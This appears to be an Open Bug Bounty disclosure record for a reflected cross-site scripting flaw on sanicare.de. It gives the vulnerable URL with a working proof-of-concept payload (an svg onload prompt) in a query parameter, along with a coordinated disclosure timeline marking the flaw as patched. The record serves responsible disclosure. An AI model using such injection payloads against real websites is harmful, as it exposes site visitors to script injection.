sanicare.de XSS vulnerability

2017-11-08T06:48:00
ID OBB:400589
Type openbugbounty
Reporter keritzy
Modified 2017-12-13T06:45:00

Description

Vulnerable URL:
https://www.sanicare.de/juckreiz-und-ekzeme;jsessionid=CCB23BDA6115253D04D456BB0D8EF14A-memc0.pla2tom2?VIEW_SIZE=xss%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E20&filterBy;=only_available&sortBy;=name
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 87045
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 November, 2017 06:48 GMT
Generic security notifications sent to website owner| 8 November, 2017 07:58 GMT
Vulnerability details disclosed by researcher| 12 December, 2017 16:25 GMT
Vulnerability patched by the website owner| 13 December, 2017 06:45 GMT